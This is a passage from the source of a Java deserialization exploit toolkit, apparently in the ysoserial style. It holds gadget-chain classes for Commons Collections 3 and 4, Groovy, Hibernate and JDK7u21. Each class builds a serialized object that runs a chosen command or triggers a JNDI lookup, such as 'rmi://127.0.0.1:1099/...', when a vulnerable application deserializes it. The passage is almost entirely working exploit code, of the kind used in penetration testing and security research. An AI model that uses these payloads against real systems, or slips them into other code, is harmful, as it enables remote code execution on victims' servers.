Exception { 43 | final Transformer transformerChain = new ChainedTransformer( 44 | new Transformer[]{new ConstantTransformer(1)}); 45 | 46 | final Map innerMap = new HashMap(); 47 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 48 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "x"); 49 | 50 | Object badAttributeValueExpException = KickOff.badAttributeValueExpException(entry); 51 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 52 | 53 | return badAttributeValueExpException; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections6E.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.RanDomUtils; 11 | import com.ppp.utils.Reflections; 12 | import org.apache.commons.collections.Transformer; 13 | import org.apache.commons.collections.functors.ChainedTransformer; 14 | import org.apache.commons.collections.functors.ConstantTransformer; 15 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 16 | import org.apache.commons.collections.map.LazyMap; 17 | 18 | import java.util.HashMap; 19 | import java.util.HashSet; 20 | import java.util.Map; 21 | 22 | /** 23 | * @author Whoopsunix 24 | */ 25 | @Dependencies({"commons-collections:commons-collections:<=3.2.1"}) 26 | @Sink({Sink.InvokerTransformer3}) 27 | @Authors() 28 | public class CommonsCollections6E implements ObjectPayload { 29 | 30 | public static void main(String[] args) throws Exception { 31 | PayloadRunner.run(CommonsCollections6E.class, args); 32 | } 33 | 34 | public Object getObject(SinksHelper sinksHelper) throws Exception { 35 | // sink 36 | Object sinkObject = SinkScheduler.builder(sinksHelper); 37 | 38 | Object kickOffObject = getChain(sinkObject); 39 | 40 | return kickOffObject; 41 | } 42 | 43 | public Object getChain(Object transformers) throws Exception { 44 | String s = RanDomUtils.generateRandomString(1); 45 | 46 | final Transformer transformerChain = new ChainedTransformer( 47 | new Transformer[]{new ConstantTransformer(1)}); 48 | 49 | final Map innerMap = new HashMap(); 50 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 51 | TiedMapEntry entry = new TiedMapEntry(lazyMap, s); 52 | 53 | // // way A 54 | // HashMap hashMap = new HashMap(); 55 | // hashMap.put(entry, "x"); 56 | // lazyMap.clear(); 57 | // 58 | // Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 59 | // 60 | // return hashMap; 61 | 62 | // way B 63 | HashMap hashMap = new HashMap(); 64 | hashMap.put(entry, s); 65 | HashSet hashSet = new HashSet(hashMap.keySet()); 66 | lazyMap.clear(); 67 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 68 | return hashSet; 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections7.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.Reflections; 11 | import org.apache.commons.collections.Transformer; 12 | import org.apache.commons.collections.functors.ChainedTransformer; 13 | import org.apache.commons.collections.map.LazyMap; 14 | 15 | import java.util.HashMap; 16 | import java.util.Hashtable; 17 | import java.util.Map; 18 | 19 | /** 20 | * @author Whoopsunix 21 | */ 22 | @Dependencies({"commons-collections:commons-collections:<=3.2.1"}) 23 | @Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI}) 24 | @Sink({Sink.InvokerTransformer3}) 25 | public class CommonsCollections7 implements ObjectPayload { 26 | 27 | public static void main(String[] args) throws Exception { 28 | PayloadRunner.run(CommonsCollections7.class, args); 29 | } 30 | 31 | public Object getObject(SinksHelper sinksHelper) throws Exception { 32 | // sink 33 | Object sinkObject = SinkScheduler.builder(sinksHelper); 34 | 35 | Object kickOffObject = getChain(sinkObject); 36 | 37 | return kickOffObject; 38 | } 39 | 40 | public Object getChain(Object transformers) throws Exception { 41 | final Transformer transformerChain = new ChainedTransformer( 42 | new Transformer[]{}); 43 | 44 | Map innerMap1 = new HashMap(); 45 | Map innerMap2 = new HashMap(); 46 | 47 | // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject 48 | Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain); 49 | lazyMap1.put("yy", 1); 50 | 51 | Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain); 52 | lazyMap2.put("zZ", 1); 53 | 54 | // Use the colliding Maps as keys in Hashtable 55 | Hashtable hashtable = new Hashtable(); 56 | hashtable.put(lazyMap1, 1); 57 | hashtable.put(lazyMap2, 2); 58 | 59 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 60 | 61 | // Needed to ensure hash collision after previous manipulations 62 | lazyMap2.remove("yy"); 63 | 64 | return hashtable; 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections9.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.RanDomUtils; 12 | import com.ppp.utils.Reflections; 13 | import org.apache.commons.collections.Transformer; 14 | import org.apache.commons.collections.functors.ChainedTransformer; 15 | import org.apache.commons.collections.functors.ConstantTransformer; 16 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 17 | import org.apache.commons.collections.map.DefaultedMap; 18 | 19 | import java.util.HashMap; 20 | import java.util.Map; 21 | 22 | /** 23 | * @author Whoopsunix 24 | */ 25 | @Dependencies({"commons-collections:commons-collections:>=3.2"}) 26 | @Authors({Authors.MEIZJM3I}) 27 | @Sink({Sink.InvokerTransformer3}) 28 | public class CommonsCollections9 implements ObjectPayload { 29 | 30 | public static void main(String[] args) throws Exception { 31 | PayloadRunner.run(CommonsCollections9.class, args); 32 | } 33 | 34 | public Object getObject(SinksHelper sinksHelper) throws Exception { 35 | // sink 36 | Object sinkObject = SinkScheduler.builder(sinksHelper); 37 | 38 | Object kickOffObject = getChain(sinkObject); 39 | 40 | return kickOffObject; 41 | } 42 | 43 | public Object getChain(Object transformers) throws Exception { 44 | String s = RanDomUtils.generateRandomString(1); 45 | 46 | final Transformer transformerChain = new ChainedTransformer( 47 | new Transformer[]{new ConstantTransformer(1)}); 48 | 49 | Map innerMap = new HashMap(); 50 | Map defaultedmap = DefaultedMap.decorate(innerMap, transformerChain); 51 | TiedMapEntry entry = new TiedMapEntry(defaultedmap, s); 52 | 53 | Object badAttributeValueExpException = KickOff.badAttributeValueExpException(entry); 54 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 55 | 56 | return badAttributeValueExpException; 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollectionsK1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.RanDomUtils; 11 | import com.ppp.utils.Reflections; 12 | import org.apache.commons.collections.functors.InvokerTransformer; 13 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 14 | import org.apache.commons.collections.map.LazyMap; 15 | 16 | import java.util.HashMap; 17 | import java.util.Map; 18 | 19 | /** 20 | * @author Whoopsunix 21 | */ 22 | @Dependencies({"commons-collections:commons-collections:<=3.2.1"}) 23 | @Authors({Authors.KORLR}) 24 | @Sink({Sink.TemplatesImpl}) 25 | public class CommonsCollectionsK1 implements ObjectPayload { 26 | 27 | public static void main(String[] args) throws Exception { 28 | PayloadRunner.run(CommonsCollectionsK1.class, args); 29 | } 30 | 31 | public Object getObject(SinksHelper sinksHelper) throws Exception { 32 | // sink 33 | Object sinkObject = SinkScheduler.builder(sinksHelper); 34 | 35 | Object kickOffObject = getChain(sinkObject); 36 | 37 | return kickOffObject; 38 | } 39 | 40 | public Object getChain(Object templates) throws Exception { 41 | String s = RanDomUtils.generateRandomString(1); 42 | 43 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 44 | HashMap innerMap = new HashMap(); 45 | Map m = LazyMap.decorate(innerMap, transformer); 46 | Map hashMap = new HashMap(); 47 | TiedMapEntry tied = new TiedMapEntry(m, templates); 48 | hashMap.put(tied, s); 49 | 50 | innerMap.clear(); 51 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 52 | 53 | return hashMap; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections4/CommonsCollections2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections4; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.Reflections; 11 | import org.apache.commons.collections4.comparators.TransformingComparator; 12 | import org.apache.commons.collections4.functors.InvokerTransformer; 13 | 14 | import java.util.PriorityQueue; 15 | 16 | /** 17 | * @author Whoopsunix 18 | */ 19 | @Dependencies({"org.apache.commons:commons-collections4:4.0"}) 20 | @Authors({Authors.FROHOFF}) 21 | @Sink({Sink.TemplatesImpl}) 22 | public class CommonsCollections2 implements ObjectPayload { 23 | 24 | public static void main(String[] args) throws Exception { 25 | PayloadRunner.run(CommonsCollections2.class, args); 26 | } 27 | 28 | public Object getObject(SinksHelper sinksHelper) throws Exception { 29 | // sink 30 | Object sinkObject = SinkScheduler.builder(sinksHelper); 31 | 32 | Object kickOffObject = getChain(sinkObject); 33 | 34 | return kickOffObject; 35 | } 36 | 37 | public Object getChain(Object templates) throws Exception { 38 | // mock method name until armed 39 | final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 40 | 41 | // create queue with numbers and basic comparator 42 | final PriorityQueue queue = new PriorityQueue(2, new TransformingComparator(transformer)); 43 | // stub data for replacement later 44 | queue.add(1); 45 | queue.add(1); 46 | 47 | // switch method called by comparator 48 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 49 | 50 | // switch contents of queue 51 | final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); 52 | queueArray[0] = templates; 53 | queueArray[1] = 1; 54 | return queue; 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections4/CommonsCollections4.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections4; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.RanDomUtils; 11 | import com.ppp.utils.Reflections; 12 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; 13 | import org.apache.commons.collections4.Transformer; 14 | import org.apache.commons.collections4.comparators.TransformingComparator; 15 | import org.apache.commons.collections4.functors.ChainedTransformer; 16 | import org.apache.commons.collections4.functors.ConstantTransformer; 17 | import org.apache.commons.collections4.functors.InstantiateTransformer; 18 | 19 | import javax.xml.transform.Templates; 20 | import java.util.PriorityQueue; 21 | 22 | /** 23 | * @author Whoopsunix 24 | */ 25 | @Dependencies({"org.apache.commons:commons-collections4:4.0"}) 26 | @Authors({Authors.FROHOFF}) 27 | @Sink({Sink.TemplatesImpl}) 28 | public class CommonsCollections4 implements ObjectPayload { 29 | 30 | public static void main(String[] args) throws Exception { 31 | PayloadRunner.run(CommonsCollections4.class, args); 32 | } 33 | 34 | public Object getObject(SinksHelper sinksHelper) throws Exception { 35 | // sink 36 | Object sinkObject = SinkScheduler.builder(sinksHelper); 37 | 38 | Object kickOffObject = getChain(sinkObject); 39 | 40 | return kickOffObject; 41 | } 42 | 43 | public Object getChain(Object templates) throws Exception { 44 | String s = RanDomUtils.generateRandomString(1); 45 | 46 | ConstantTransformer constant = new ConstantTransformer(String.class); 47 | 48 | // mock method name until armed 49 | Class[] paramTypes = new Class[]{String.class}; 50 | Object[] args = new Object[]{s}; 51 | InstantiateTransformer instantiate = new InstantiateTransformer( 52 | paramTypes, args); 53 | 54 | // grab defensively copied arrays 55 | paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes"); 56 | args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs"); 57 | 58 | ChainedTransformer chain = new ChainedTransformer(new Transformer[]{constant, instantiate}); 59 | 60 | // create queue with numbers 61 | PriorityQueue queue = new PriorityQueue(2, new TransformingComparator(chain)); 62 | queue.add(1); 63 | queue.add(1); 64 | 65 | // swap in values to arm 66 | Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class); 67 | paramTypes[0] = Templates.class; 68 | args[0] = templates; 69 | return queue; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections4/CommonsCollections8.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections4; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.Reflections; 11 | import org.apache.commons.collections.bag.TreeBag; 12 | import org.apache.commons.collections4.comparators.TransformingComparator; 13 | import org.apache.commons.collections4.functors.InvokerTransformer; 14 | 15 | /** 16 | * @author Whoopsunix 17 | */ 18 | @Dependencies({"org.apache.commons:commons-collections4:4.0"}) 19 | @Authors({Authors.NAVALORENZO}) 20 | @Sink({Sink.TemplatesImpl}) 21 | public class CommonsCollections8 implements ObjectPayload { 22 | 23 | public static void main(String[] args) throws Exception { 24 | PayloadRunner.run(CommonsCollections8.class, args); 25 | } 26 | 27 | public Object getObject(SinksHelper sinksHelper) throws Exception { 28 | // sink 29 | Object sinkObject = SinkScheduler.builder(sinksHelper); 30 | 31 | Object kickOffObject = getChain(sinkObject); 32 | 33 | return kickOffObject; 34 | } 35 | 36 | public Object getChain(Object templates) throws Exception { 37 | final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 38 | 39 | // define the comparator used for sorting 40 | TransformingComparator comp = new TransformingComparator(transformer); 41 | 42 | // prepare CommonsCollections object entry point 43 | TreeBag treeBag = new TreeBag(comp); 44 | treeBag.add(templates); 45 | 46 | // arm transformer 47 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 48 | 49 | return treeBag; 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections4/CommonsCollectionsK2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections4; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.RanDomUtils; 11 | import com.ppp.utils.Reflections; 12 | import org.apache.commons.collections4.functors.InvokerTransformer; 13 | import org.apache.commons.collections4.keyvalue.TiedMapEntry; 14 | import org.apache.commons.collections4.map.LazyMap; 15 | 16 | import java.util.HashMap; 17 | import java.util.Map; 18 | 19 | /** 20 | * @author Whoopsunix 21 | */ 22 | @Dependencies({"org.apache.commons:commons-collections4:4.0"}) 23 | @Authors({Authors.KORLR}) 24 | @Sink({Sink.TemplatesImpl}) 25 | public class CommonsCollectionsK2 implements ObjectPayload { 26 | 27 | public static void main(String[] args) throws Exception { 28 | PayloadRunner.run(CommonsCollectionsK2.class, args); 29 | } 30 | 31 | public Object getObject(SinksHelper sinksHelper) throws Exception { 32 | // sink 33 | Object sinkObject = SinkScheduler.builder(sinksHelper); 34 | 35 | Object kickOffObject = getChain(sinkObject); 36 | 37 | return kickOffObject; 38 | } 39 | 40 | public Object getChain(Object templates) throws Exception { 41 | String s = RanDomUtils.generateRandomString(1); 42 | 43 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 44 | HashMap innerMap = new HashMap(); 45 | LazyMap lazyMap = LazyMap.lazyMap(innerMap, transformer); 46 | 47 | Map hashMap = new HashMap(); 48 | TiedMapEntry tied = new TiedMapEntry(lazyMap, templates); 49 | hashMap.put(tied, s); 50 | innerMap.clear(); 51 | 52 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 53 | return hashMap; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections4/CommonsCollectionsK4.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections4; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.EnchantType; 11 | import com.ppp.sinks.annotation.Sink; 12 | import com.ppp.utils.RanDomUtils; 13 | import com.ppp.utils.Reflections; 14 | import org.apache.commons.collections4.Transformer; 15 | import org.apache.commons.collections4.functors.ChainedTransformer; 16 | import org.apache.commons.collections4.functors.ConstantTransformer; 17 | import org.apache.commons.collections4.keyvalue.TiedMapEntry; 18 | import org.apache.commons.collections4.map.LazyMap; 19 | 20 | import java.util.HashMap; 21 | import java.util.Map; 22 | 23 | /** 24 | * @author Whoopsunix 25 | */ 26 | @Dependencies({"org.apache.commons:commons-collections4:4.0"}) 27 | @Authors({Authors.KORLR}) 28 | @Sink({Sink.InvokerTransformer4}) 29 | public class CommonsCollectionsK4 implements ObjectPayload { 30 | 31 | public static void main(String[] args) throws Exception { 32 | // PayloadRunner.run(CommonsCollectionsK4.class, args); 33 | 34 | SinksHelper sinksHelper = new SinksHelper(); 35 | sinksHelper.setSink(CommonsCollectionsK4.class.getAnnotation(Sink.class).value()[0]); 36 | sinksHelper.setEnchant(EnchantType.DEFAULT); 37 | sinksHelper.setCommand("open -a Calculator.app"); 38 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 39 | javaClassHelper.setExtendsAbstractTranslet(true); 40 | sinksHelper.setJavaClassHelper(javaClassHelper); 41 | PayloadRunner.run(CommonsCollectionsK4.class, args, sinksHelper); 42 | } 43 | 44 | public Object getObject(SinksHelper sinksHelper) throws Exception { 45 | // sink 46 | Object sinkObject = SinkScheduler.builder(sinksHelper); 47 | 48 | Object kickOffObject = getChain(sinkObject); 49 | 50 | return kickOffObject; 51 | } 52 | 53 | public Object getChain(Object transformers) throws Exception { 54 | String s = RanDomUtils.generateRandomString(1); 55 | 56 | final Transformer transformerChain = new ChainedTransformer( 57 | new Transformer[]{new ConstantTransformer(1)}); 58 | 59 | HashMap innerMap = new HashMap(); 60 | LazyMap lazyMap = LazyMap.lazyMap(innerMap, transformerChain); 61 | 62 | Map hashMap = new HashMap(); 63 | TiedMapEntry tied = new TiedMapEntry(lazyMap, s); 64 | hashMap.put(tied, s); 65 | innerMap.clear(); 66 | 67 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 68 | return hashMap; 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/groovy/Groovy1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.groovy; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import org.codehaus.groovy.runtime.ConvertedClosure; 11 | import org.codehaus.groovy.runtime.MethodClosure; 12 | 13 | import java.lang.reflect.InvocationHandler; 14 | import java.util.Map; 15 | 16 | 17 | @Dependencies({"org.codehaus.groovy:groovy:<=2.4.3"}) 18 | @Authors({Authors.FROHOFF}) 19 | @Sink({Sink.Default}) 20 | public class Groovy1 implements ObjectPayload { 21 | 22 | public static void main(String[] args) throws Exception { 23 | PayloadRunner.run(Groovy1.class, args); 24 | } 25 | 26 | public Object getObject(SinksHelper sinksHelper) throws Exception { 27 | // sink 28 | String command = sinksHelper.getCommand(); 29 | 30 | Object kickOffObject = getChain(command); 31 | 32 | return kickOffObject; 33 | } 34 | 35 | public Object getChain(String command) throws Exception { 36 | final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet"); 37 | 38 | final Map map = KickOff.createProxy(closure, Map.class); 39 | 40 | final InvocationHandler handler = KickOff.annotationInvocationHandler(map); 41 | 42 | return handler; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/groovy/Groovy2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.groovy; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinksHelper; 8 | import com.ppp.sinks.annotation.Sink; 9 | import com.ppp.utils.Reflections; 10 | import org.codehaus.groovy.runtime.ConvertedClosure; 11 | import org.codehaus.groovy.runtime.MethodClosure; 12 | 13 | import java.lang.reflect.Proxy; 14 | import java.util.Comparator; 15 | import java.util.PriorityQueue; 16 | 17 | /** 18 | * Source 点 PriorityQueue 19 | */ 20 | @Dependencies({"org.codehaus.groovy:groovy:<=2.4.3"}) 21 | @Authors({Authors.Whoopsunix}) 22 | @Sink({Sink.Default}) 23 | public class Groovy2 implements ObjectPayload { 24 | 25 | public static void main(String[] args) throws Exception { 26 | PayloadRunner.run(Groovy2.class, args); 27 | } 28 | 29 | public Object getObject(SinksHelper sinksHelper) throws Exception { 30 | // sink 31 | String command = sinksHelper.getCommand(); 32 | 33 | Object kickOffObject = getChain(command); 34 | 35 | return kickOffObject; 36 | } 37 | 38 | public Object getChain(String command) throws Exception { 39 | final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "compare"); 40 | 41 | // Create Comparator Proxy 42 | Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class[]{Comparator.class}, closure); 43 | 44 | // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) 45 | final PriorityQueue priorityQueue = new PriorityQueue(2, comparator); 46 | Reflections.setFieldValue(priorityQueue, "queue", new Object[]{null, null}); 47 | Reflections.setFieldValue(priorityQueue, "size", 2); 48 | 49 | return priorityQueue; 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/hibernate/Hibernate2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.hibernate; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.EnchantType; 11 | import com.ppp.sinks.annotation.Sink; 12 | import com.sun.rowset.JdbcRowSetImpl; 13 | 14 | /** 15 | * Another application filter bypass 16 | *

17 | * Needs a getter invocation that is provided by hibernate here 18 | *

19 | * javax.naming.InitialContext.InitialContext.lookup() 20 | * com.sun.rowset.JdbcRowSetImpl.connect() 21 | * com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData() 22 | * org.hibernate.property.access.spi.GetterMethodImpl.get() 23 | * org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue() 24 | * org.hibernate.type.ComponentType.getPropertyValue(C) 25 | * org.hibernate.type.ComponentType.getHashCode() 26 | * org.hibernate.engine.spi.TypedValue$1.initialize() 27 | * org.hibernate.engine.spi.TypedValue$1.initialize() 28 | * org.hibernate.internal.util.ValueHolder.getValue() 29 | * org.hibernate.engine.spi.TypedValue.hashCode() 30 | *

31 | *

32 | * Requires: 33 | * - Hibernate (>= 5 gives arbitrary method invocation, <5 getXYZ only) 34 | *

35 | * Arg: 36 | * - JNDI name (i.e. rmi:) 37 | *

38 | * Yields: 39 | * - JNDI lookup invocation (e.g. connect to remote RMI) 40 | * 41 | * @author mbechler 42 | */ 43 | @Dependencies({"org.hibernate:hibernate-core"}) 44 | @Authors({Authors.MBECHLER}) 45 | @Sink({Sink.JNDI}) 46 | public class Hibernate2 implements ObjectPayload { 47 | 48 | public static void main(String[] args) throws Exception { 49 | // PayloadRunner.run(Hibernate2.class, args); 50 | 51 | SinksHelper sinksHelper = new SinksHelper(); 52 | sinksHelper.setSink(Hibernate2.class.getAnnotation(Sink.class).value()[0]); 53 | sinksHelper.setEnchant(EnchantType.DEFAULT); 54 | sinksHelper.setCommand("rmi://127.0.0.1:1099/wtkwre"); 55 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 56 | javaClassHelper.setExtendsAbstractTranslet(true); 57 | sinksHelper.setJavaClassHelper(javaClassHelper); 58 | 59 | PayloadRunner.run(Hibernate2.class, args, sinksHelper); 60 | } 61 | 62 | public Object getObject(SinksHelper sinksHelper) throws Exception { 63 | // sink 64 | Object sinkObject = SinkScheduler.builder(sinksHelper); 65 | 66 | Object kickOffObject = getChain(sinkObject); 67 | 68 | return kickOffObject; 69 | } 70 | 71 | public Object getChain(Object command) throws Exception { 72 | JdbcRowSetImpl rs = new JdbcRowSetImpl(); 73 | rs.setDataSourceName((String) command); 74 | return Hibernate1.makeCaller(rs, Hibernate1.makeGetter(rs.getClass(), "getDatabaseMetaData")); 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jdk/JDK7u21.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jdk; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.RanDomUtils; 12 | import com.ppp.utils.Reflections; 13 | 14 | import javax.xml.transform.Templates; 15 | import java.lang.reflect.InvocationHandler; 16 | import java.util.HashMap; 17 | import java.util.LinkedHashSet; 18 | 19 | /** 20 | * @author Whoopsunix 21 | */ 22 | @Dependencies({"JDK:JDK7u21"}) 23 | @Authors({Authors.FROHOFF}) 24 | @Sink({Sink.TemplatesImpl}) 25 | public class JDK7u21 implements ObjectPayload { 26 | 27 | public static void main(String[] args) throws Exception { 28 | PayloadRunner.run(JDK7u21.class, args); 29 | } 30 | 31 | public Object getObject(SinksHelper sinksHelper) throws Exception { 32 | // sink 33 | Object sinkObject = SinkScheduler.builder(sinksHelper); 34 | 35 | Object kickOffObject = getChain(sinkObject); 36 | 37 | return kickOffObject; 38 | } 39 | 40 | public Object getChain(Object templates) throws Exception { 41 | String s = RanDomUtils.generateRandomString(1); 42 | 43 | String zeroHashCodeStr = "f5a5a608"; 44 | 45 | HashMap map = new HashMap(); 46 | map.put(zeroHashCodeStr, s); 47 | 48 | InvocationHandler handler = KickOff.annotationInvocationHandler(map); 49 | Reflections.setFieldValue(handler, "type", Templates.class); 50 | Templates proxy = KickOff.createProxy(handler, Templates.class); 51 | 52 | LinkedHashSet hashSet = new LinkedHashSet(); // maintain order 53 | hashSet.add(templates); 54 | hashSet.add(proxy); 55 | 56 | Reflections.setFieldValue(templates, "_auxClasses", null); 57 | Reflections.setFieldValue(templates, "_class", null); 58 | 59 | map.put(zeroHashCodeStr, templates); // swap in real object 60 | 61 | return hashSet; 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/jdk/JDK7u21Lite.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.jdk; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.Reflections; 12 | 13 | import javax.xml.transform.Templates; 14 | import java.lang.reflect.InvocationHandler; 15 | import 